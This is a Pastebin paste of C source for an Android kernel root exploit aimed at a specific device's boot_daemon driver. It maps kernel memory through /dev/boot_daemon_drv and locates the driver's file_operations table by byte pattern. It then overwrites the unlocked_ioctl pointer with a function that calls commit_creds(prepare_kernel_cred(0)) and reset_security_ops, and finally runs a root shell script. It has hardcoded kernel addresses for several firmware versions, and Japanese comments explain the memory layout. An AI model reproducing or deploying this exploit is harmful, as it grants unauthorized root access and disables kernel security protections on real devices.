Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <stdio.h>
- #include <stdint.h>
- #include <stdlib.h>
- #include <unistd.h>
- #include <fcntl.h>
- #include <errno.h>
- #include <sys/stat.h>
- #include <fcntl.h>
- #include <sys/mman.h>
- #include <sys/ioctl.h>
- #include "kexec.h"
- void memdump(char* addr, int num)
- {
- int i, j;
- int n = (num + 15) / 16;
- for (j=0; j<n; j++){
- printf("%08x : ", addr);
- for(i=0; i<16; i++){
- printf("%02x ", *addr++);
- }
- addr -= 16;
- for(i=0; i<16; i++){
- if (*addr>=0x20 && *addr<0x80) {
- printf("%c", *addr);
- } else {
- printf(".");
- }
- addr++;
- }
- printf("\n");
- }
- }
- volatile int iscalled = 0;
- unsigned long (*kallsyms_lookup_name)(const char *name) = (void*)0;
- long getroot_ioctl(unsigned int fd, unsigned int cmd, unsigned long arg)
- {
- if(kallsyms_lookup_name == 0) return 0;
- int(*commit_creds)(void*) = (void*)kallsyms_lookup_name("commit_creds");
- void*(*prepare_kernel_cred)(void*) = (void*)kallsyms_lookup_name("prepare_kernel_cred");
- void (*reset_security_ops)(void) = (void*)kallsyms_lookup_name("reset_security_ops");
- if(commit_creds != 0 && prepare_kernel_cred != 0){
- commit_creds(prepare_kernel_cred(0));
- }
- if(reset_security_ops != 0){
- reset_security_ops();
- }
- iscalled = 1;
- return 0;
- }
- // goroh_kun wrote:
- //
- // (1)ダンプしたテキスト内で以下の文字列を探します
- //
- // deadline
- //
- // ※その0x70ぐらい上にnoopが見える箇所です。
- //
- // (2)その0x400ぐらい下に以下のバイトパターンが存在する
- // 24 01 00 00 xx xx xx c0 00 00 00 00 xx xx xx c0 00 00 00 00
- // 24 01 00 00 xx xx xx c0 00 00 00 00 xx xx xx c0 00 00 00 00
- // 24 01 00 00 xx xx xx c0 00 00 00 00 00 00 00 00 00 00 00 00
- //
- // (3)その次の xx xx xx c0がshboot_daemon_readのアドレスです。
- // (4)(3)の次のxx xx xx c0がshboot_daemon_writeのアドレスです。
- // (5)次しばらく0が続いて、次のxx xx xx c0がshboot_daemon_mmap,shboot_daemon_open
- // (6)shboot_daemon_mmapの一個前の00 00 00 00がcompat_ioctl,その一個前の00 00 00 00が
- // unlocked_ioctl関数のポインタになります。
- //
- // このunlocked_ioctlのデータにパッチを当てるのが良いと思います。
- // 既に/dev/boot_daemon_drvはopen済みですし。
- //
- // オススメは、shbootgetrootプログラム内にroot取得関数をおいておき、
- // その関数のアドレスを書いてしまうのが良いと思います。
- //
- // そうすれば、/dev/boot_daemon_drvのfdに対してioctlした段階で、root取得関数が
- // 呼ばれるようになります。
- //
- unsigned long patch_mem(unsigned int* mem, unsigned long length)
- {
- char* addr = (char*)mem;
- while(addr < (char*)mem + length - 136) {
- if (
- /*
- addr[ 0] == 0x24 && addr[ 1] == 0x01 && addr[ 2] == 0x00 && addr[ 3] == 0x00 &&
- addr[ 7] == 0xc0 &&
- addr[ 8] == 0x00 && addr[ 9] == 0x00 && addr[ 10] == 0x00 && addr[ 11] == 0x00 &&
- addr[ 15] == 0xc0 &&
- addr[ 16] == 0x00 && addr[ 17] == 0x00 && addr[ 18] == 0x00 && addr[ 19] == 0x00 &&
- addr[ 20] == 0x24 && addr[ 21] == 0x01 && addr[ 22] == 0x00 && addr[ 23] == 0x00 &&
- addr[ 27] == 0xc0 &&
- addr[ 28] == 0x00 && addr[ 29] == 0x00 && addr[ 30] == 0x00 && addr[ 31] == 0x00 &&
- addr[ 35] == 0xc0 &&
- addr[ 36] == 0x00 && addr[ 37] == 0x00 && addr[ 38] == 0x00 && addr[ 39] == 0x00 &&
- addr[ 20] == 0x24 && addr[ 21] == 0x01 && addr[ 22] == 0x00 && addr[ 23] == 0x00 &&
- addr[ 27] == 0xc0 &&
- addr[ 28] == 0x00 && addr[ 29] == 0x00 && addr[ 30] == 0x00 && addr[ 31] == 0x00 &&
- */
- addr[ 32] == 0x00 && addr[ 33] == 0x00 && addr[ 34] == 0x00 && addr[ 35] == 0x00 && //(owner)
- addr[ 36] == 0x00 && addr[ 37] == 0x00 && addr[ 38] == 0x00 && addr[ 39] == 0x00 && //(llseek)
- addr[ 43] == 0xc0 && //shboot_daemon_read
- addr[ 47] == 0xc0 && //shboot_daemon_write (-0xc8)
- addr[ 48] == 0x00 && addr[ 49] == 0x00 && addr[ 50] == 0x00 && addr[ 51] == 0x00 && //(aio_read)
- addr[ 52] == 0x00 && addr[ 53] == 0x00 && addr[ 54] == 0x00 && addr[ 55] == 0x00 && //(aio_write)
- addr[ 56] == 0x00 && addr[ 57] == 0x00 && addr[ 58] == 0x00 && addr[ 59] == 0x00 && //(readdir)
- addr[ 60] == 0x00 && addr[ 61] == 0x00 && addr[ 62] == 0x00 && addr[ 63] == 0x00 && //(poll)
- addr[ 64] == 0x00 && addr[ 65] == 0x00 && addr[ 66] == 0x00 && addr[ 67] == 0x00 && //(ioctl)
- addr[ 68] == 0x00 && addr[ 69] == 0x00 && addr[ 70] == 0x00 && addr[ 71] == 0x00 && //(unlocked_ioctl)
- addr[ 72] == 0x00 && addr[ 73] == 0x00 && addr[ 74] == 0x00 && addr[ 75] == 0x00 && //(compat_ioctl)
- addr[ 79] == 0xc0 && //shboot_daemon_mmap (-0x120)
- addr[ 83] == 0xc0 && //shboot_daemon_open (-0x164)
- addr[ 84] == 0x00 && addr[ 85] == 0x00 && addr[ 86] == 0x00 && addr[ 87] == 0x00 && //(flush)
- addr[ 91] == 0xc0 && //shboot_daemon_release (-0x140)
- addr[ 92] == 0x00 && addr[ 93] == 0x00 && addr[ 94] == 0x00 && addr[ 95] == 0x00 && //(fsync)
- addr[ 96] == 0x00 && addr[ 97] == 0x00 && addr[ 98] == 0x00 && addr[ 99] == 0x00 && //(aio_fsync)
- addr[100] == 0x00 && addr[101] == 0x00 && addr[102] == 0x00 && addr[103] == 0x00 && //(fasync)
- addr[104] == 0x00 && addr[105] == 0x00 && addr[106] == 0x00 && addr[107] == 0x00 && //(lock)
- addr[108] == 0x00 && addr[109] == 0x00 && addr[110] == 0x00 && addr[111] == 0x00 && //(sendpage)
- addr[112] == 0x00 && addr[113] == 0x00 && addr[114] == 0x00 && addr[115] == 0x00 && //(get_unmapped_area)
- addr[116] == 0x00 && addr[117] == 0x00 && addr[118] == 0x00 && addr[119] == 0x00 && //(check_flags)
- addr[120] == 0x00 && addr[121] == 0x00 && addr[122] == 0x00 && addr[123] == 0x00 && //(flock)
- addr[124] == 0x00 && addr[125] == 0x00 && addr[126] == 0x00 && addr[127] == 0x00 && //(splice_write)
- addr[128] == 0x00 && addr[129] == 0x00 && addr[130] == 0x00 && addr[131] == 0x00 && //(splice_read)
- addr[132] == 0x00 && addr[133] == 0x00 && addr[134] == 0x00 && addr[135] == 0x00 //(setlease)
- ) {
- printf("addr=%08x\n", addr);
- fflush(stdout);
- unsigned long *p_read = (unsigned long*)(addr[40] + (addr[41]<<8) + (addr[42]<<16) + (addr[43]<<24));
- unsigned long *p_write = (unsigned long*)(addr[44] + (addr[45]<<8) + (addr[46]<<16) + (addr[47]<<24));
- unsigned long *p_mmap = (unsigned long*)(addr[76] + (addr[77]<<8) + (addr[78]<<16) + (addr[79]<<24));
- unsigned long *p_open = (unsigned long*)(addr[80] + (addr[81]<<8) + (addr[82]<<16) + (addr[83]<<24));
- unsigned long *p_release = (unsigned long*)(addr[88] + (addr[89]<<8) + (addr[90]<<16) + (addr[91]<<24));
- printf("read=%08x\n", p_read);
- printf("write=%08x\n", p_write);
- printf("mmap=%08x\n", p_mmap);
- printf("open=%08x\n", p_open);
- printf("release=%08x\n", p_release);
- fflush(stdout);
- //#define GETROOT_NEED_CHECK_ADDRESS_OFFSET
- #ifdef GETROOT_NEED_CHECK_ADDRESS_OFFSET
- if (p_read - p_write == 0xc8 && p_read - p_mmap == 0x120 &&
- p_read - p_open == 0x164 && p_release - p_open == 0x140) {
- #endif
- printf("found at %08x\n", (addr));
- fflush(stdout);
- memdump((char*)(addr+32), 0x68);
- fflush(stdout);
- addr[68] = (unsigned long)&getroot_ioctl & 0xff;
- addr[69] = ((unsigned long)&getroot_ioctl>>8) & 0xff;
- addr[70] = ((unsigned long)&getroot_ioctl>>16) & 0xff;
- addr[71] = ((unsigned long)&getroot_ioctl>>24) & 0xff;
- return (unsigned long)(addr + 68);
- #ifdef GETROOT_NEED_CHECK_ADDRESS_OFFSET
- }
- #endif
- printf("\n");
- }
- addr += 4;
- }
- return -1;
- }
- int callback(void *data, int nr, char *str, unsigned long targetbase, unsigned long targetlength)
- {
- unsigned long addr;
- int fd = open("/dev/boot_daemon_drv", O_RDWR);
- printf("mmap base=%08x length=%08x\n", targetbase, targetlength);
- if(fd < 0){
- printf("open failed \"%s\"(%d)\n", strerror(errno), errno);
- return 0;
- }
- addr = 0x10000000;
- unsigned int *mem = (unsigned int*)mmap(
- (void*)addr, targetlength, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_SHARED, fd, targetbase);
- if(mem == MAP_FAILED)
- {
- printf("mmap error %08X \"%s\"(%d)\n", targetbase, strerror(errno), errno);
- } else {
- char buf[0x4000];
- int fdmap = open("/proc/self/maps", O_RDONLY);
- int ret = read(fdmap, buf, sizeof(buf));
- write(0, buf, ret);
- fflush(stdout);
- close(fdmap);
- printf("mem=%08x\n", mem);
- fflush(stdout);
- unsigned long patch = patch_mem(mem, targetlength);
- if (patch != -1) {
- if (munmap(mem, targetlength)) {
- printf("munmap error \"%s\"(%d)\n", strerror(errno), errno);
- } else {
- printf("munmaped\n");
- }
- fflush(stdout);
- usleep(100000);
- ioctl(fd, 0, 0);
- printf("iscalled=%d\n", iscalled);
- usleep(100000);
- mem = (unsigned int*)mmap(
- (void*)addr, targetlength, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_SHARED, fd, targetbase);
- if(mem == MAP_FAILED) {
- printf("re-mmap error %08X \"%s\"(%d)\n", targetbase, strerror(errno), errno);
- } else {
- printf("remmaped\n");
- char* a = (char*) patch;
- memdump((char*)(a-36), 0x68);
- printf("\n");
- a[0] =0;
- a[1] =0;
- a[2] =0;
- a[3] =0;
- printf("re-patched\n");
- memdump((char*)(a-36), 0x68);
- printf("\n");
- }
- close(fd);
- // execl("/system/bin/sh", "/system/bin/sh", "-i", NULL);
- {
- char *par[10];
- par[0] = "/system/bin/sh";
- par[1] = "/data/local/autoexec.sh";
- par[2] = (char*)0;
- execve(par[0],par, environ);
- }
- return -1;
- }
- if (munmap(mem, targetlength)) {
- printf("munmap error \"%s\"(%d)\n", strerror(errno), errno);
- }
- if (close(fd)) {
- printf("close error \"%s\"(%d)\n", strerror(errno), errno);
- }
- return 0;
- }
- close(fd);
- return 0;
- }
- int main(int argc, char** argv)
- {
- if(argc < 2) return -1;
- switch(atoi(argv[1])){
- case 0: // 01.00.01
- kallsyms_lookup_name = (void*)0xc00be3b4;
- break;
- case 1: // 01.00.03
- case 2: // 01.00.04
- kallsyms_lookup_name = (void*)0xc00bf784;
- break;
- }
- kexec_iomem_for_each_line("Kernel data", callback, 0);
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement